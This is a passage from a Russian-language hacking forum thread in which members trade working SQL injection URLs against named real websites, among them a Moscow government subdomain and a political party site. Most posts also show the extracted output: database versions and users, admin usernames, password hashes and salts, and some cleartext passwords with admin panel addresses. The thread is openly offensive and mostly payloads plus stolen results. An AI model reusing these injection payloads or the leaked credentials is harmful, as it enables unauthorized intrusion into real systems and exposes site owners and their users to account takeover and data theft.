SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. serfertty

    serfertty Guest

    Reputations:
    0
    Code:
    http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-41+union+select+1,2,unhex(hex(version())),4/*
    Версия 4,но мне повезло
    Code:
    http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-41+union+select+unhex(hex(password)),2,unhex(hex(user)),4+from+mysql.user/*
    root: 066bc62049564980
     
  2. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Пополним коллекцию:

    http://www.svadba.tu2.ru/

    Code:
    http://www.svadba.tu2.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user,0x3a,database())--
    version() - 5.0.51a
    user() - logsvadba6@localhost
    database() - logsvadba6

    Достаем хэш админа:

    Code:
    http://www.svadba.tu2.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password,0x3a,usertype)+from+jos_users--
    username : pass(md5) : salt

    admin : 589ffec19b0ce895974aec9a5425e603 : S6L9oPNyOuyrzK9d
     
    1 person likes this.
  3. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://www.unioneconsulenti.it/article.php?sid=1%20UNION%20SELECT%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9/*

    Code:
    5.0.32-Debian_7etch1-log:unioneconsulenti:userconsulenti@localhost

    Code:
    http://www.ipodhacks.com/article.php?sid=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11/*
    Code:
    4.0.27-standard:ipodhack_mains
     
    2 people like this.
  4. mefish

    mefish Elder - Старейшина

    Joined:
    13 Apr 2008
    Messages:
    33
    Likes Received:
    12
    Reputations:
    0
    Ну и я немного ;) :

    Code:
    http://www.flirtanica.ru/articles1.php?id=-262+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())/*
    4.1.22:wwwflirtanicaru:flirtani@localhost
     
    2 people like this.
  5. serfertty

    serfertty Guest

    Reputations:
    0
    Code:
    http://www.barcelo.edu.ar/vernoticia.php?id=-1+union+select+1,2,3,4,5,6,7,8,unhex(hex(user())),unhex(hex(version())),unhex(hex(database())),12,13,14,15,16,17,18,19,20,21/*
    uv0001@localhost
    4.1.14-log

    uv0001_barcelo
     
    1 person likes this.
  6. Elvis000

    Elvis000 Патриот

    Joined:
    23 Apr 2007
    Messages:
    600
    Likes Received:
    339
    Reputations:
    148
    АвиаБилеты в Москве

    www.samoletom.ru

    Code:
    http://www.samoletom.ru/txt/spo.php?id=-59+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),4,5,6,7,8,9,10/*
    samoletom_db@localhost, 5.0.18-log

    Таблички нормально перебираются

    Code:
    http://www.samoletom.ru/txt/spo.php?id=-59+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(TABLE_NAME,0x71),0x71),3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+16,1/*
     
    1 person likes this.
  7. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    avis-tour.ru
    Code:
    http://www.avis-tour.ru/?action=country&do=1&id=75&page_id=-37+UNION+SELECT+1,2,concat_ws(0x1,id,u_login,u_passwd,u_name,u_active)+from+t_users%20limit%200,1/*
    
    2Julia9410323Julia1
    3Adminfrekbyby935Admin0
    Админка даж не представляю куда спряталось ;)
     
  8. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    http://www.dubkow-muehle.de

    Code:
    http://www.dubkow-muehle.de/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user(),0x3a,database())--
    version() - 5.0.45
    user() - ks0114@localhost
    database() - ks0114db4

    Достаем хэш админа:

    Code:
    http://www.dubkow-muehle.de/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password,0x3a,usertype)+from+jos_users--
    login : pass(md5)

    admin : 4518a2bcb56db571ef9002d9787b9365
     
  9. Elephant

    Elephant New Member

    Joined:
    31 Jul 2008
    Messages:
    10
    Likes Received:
    2
    Reputations:
    -5
    Ракрутил с помощью ачатовца)))
    А из форума ничё не выудил, а админка стоит огронечитель по IP, обидно блин! хотя взломать то можно, только сплоита под версию того форума я не нашел((((
     
    1 person likes this.
  10. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Какая то шляпа..
    http://www.abllm.se/?produkt=-1+union+select+1,2,3,4,5,6,7,concat(name,0x3a3a,pass),9,10,11,12,13,14,15,16,17,18+from+users+limit+4,1

    login:goran pass:John6320 http://www.abllm.se/admin/
    --------------------------------------------------------------------------------

    Тоже Г*** непонятного назначения...
    p://www.fraktsidan.se/read.php?id=-1+union+select+1,concat(username,0x3a3a,pass),3,4,5,6,7,8,9,10,11+from+frakt_users+limit+0,1/*
    login:Christer pass:3596

    ----------------------------------------------------------------
    Туси!!!!(co Jaccass)

    http://lanpartys.tv/artikel.php?y=&m=-1+union+select+1,concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+usr_web22_1.np_user+limit+0,1/*

    login:admin pass:budsabong
     
  11. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Скули..

    Theplace.ru - трафистый сайт )
    5 ветка, таблы..
    юзеры.. походу от форума..


    Mares.com
    5 версия.. таблы..
    /admin


    Fotohoster.ru
    Vstile.ru
    Мне домен понравился )
     
    #6371 sabe, 25 Aug 2008
    Last edited: 25 Aug 2008
    1 person likes this.
  12. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    http://www.er34.ru/

    Единая Россия

    Code:
    http://www.er34.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user(),0x3a,database())--
    version() - 5.0.51a-log
    user() - [email protected]
    database() - HST-79811-1

    Админ:
    Code:
    http://www.er34.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password)+from+jos_users--
    login : password

    amdin : 99be844677c58d723605ea5a1b558741

    P.S: админский логин именно amdin, а не admin.

    Расшифровать неполучилось(
     
    #6372 USAkid, 25 Aug 2008
    Last edited: 25 Aug 2008
  13. serfertty

    serfertty Guest

    Reputations:
    0
    Кто там не любит власть?
    Code:
    http://sao.mos.ru/?r=9_9&cat=16&type=28'
    Поддомены
    Code:
    http://vdeg.sao.mos.ru/news_full.php?id=-16583+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5/*
    4.1.12:sao@chicken:sao
     
  14. dr.Pilulkin

    dr.Pilulkin Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    http://www.marinersoftware.com/sitepage.php?page=-85+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

    /home/marinersoftware/www/sitepage.php

    marinersoftware@localhost
    4.0.24
    marinersoftware
     
  15. [CRC]

    [CRC] Member

    Joined:
    22 Nov 2007
    Messages:
    18
    Likes Received:
    8
    Reputations:
    0
    Code:
    http://www.contzert.ru/?page=order&id=99999+union+select+1,2,concat(0x3a3a,user(),0x3a3a,version(),0x3a3a,database()),4,5,6,7,8,9,10,11/*
     
    1 person likes this.
  16. dr.Pilulkin

    dr.Pilulkin Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    hst-79811-1.admins
    username
    user_password

    hst-79811-1.ibf_members_converge
    converge_pass_hash
    converge_pass_salt

    hst-79811-1.sn_admins
    admin_id
    login
    password

    adminyug:5b16e49c4618bfc9b90665f38687af57
    adminyug:5c8d3eee993f0bd5cde03ae5e018e5ac
    yugrig:61686402abe82e0748c9fef76fb9f326
    amdin:99be844677c58d723605ea5a1b558741

    Хорошие пароли у него похоже :(
     
    #6376 dr.Pilulkin, 25 Aug 2008
    Last edited: 25 Aug 2008
  17. serfertty

    serfertty Guest

    Reputations:
    0
    Code:
    http://www.barcelo.edu.ar/vernoticia.php?id=1+union+select+1,2,3,4,5,6,7,8,unhex(hex(version())),10,11,12,13,14,15,16,17,18,19,20,21/*
    http://www.calcsandmore.com/hlavni.php3?PLANG=&rec=-1+union+Select+version()/*
    http://www.dr-wellering.de/index.php?topid=675&groupid=3226&subgroupid=0&contentid=-7331+union+select++1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,unhex(hex(version())),24,25/*
    http://www.infosecur.ru/out_e.php?id=-1018+union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13/*
    http://intelt.com/spb/hotel/?id=-1+union+select+1,version(),user(),4,5/*
     
  18. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://www.unitedcorevision.com/id/print.php?type=A&zid=1+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9/*
     
    1 person likes this.
  19. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    version():5
     
  20. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    ))

    Вот что я нарыл за 3 часа :D

    http://www.greenshift.com/news.php?id=-134+union+select+1,password,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
    http://www.rdi-cam.com/pic.php?i=-33+union+select+1,2,3,4,5,6,7,8/*
    --
    http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,2,3&limit=0
    Список БД
    http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,table_name,3+from+INFORMATION_SCHEMA.TABLES&limit=0
    --
    http://www.merryhearts.org/news.php?id=-13+union+select+1,2,3,4,5,6,7/*
    http://ledi.ru/news.php?id=-13+union+select+1,2,3,table_name,5,6+from+INFORMATION_SCHEMA.TABLES+limit+25,1&te=0
    http://ledi.ru/news.php?id=-13+union+select+1,2,3,table_name,5,6+from+INFORMAT ION_SCHEMA.TABLES+limit+15,1&te=0
    http://ledi.ru/news.php?id=-13+union+select+1,2,3,table_name,5,6+from+INFORMAT ION_SCHEMA.TABLES+limit+16,1&te=0

    Можете по перебирать таблицы используя limit+от 0,1 до непомню до скольки
    :)
     
    #6380 SeNaP, 25 Aug 2008
    Last edited: 25 Aug 2008
Thread Status:
Not open for further replies.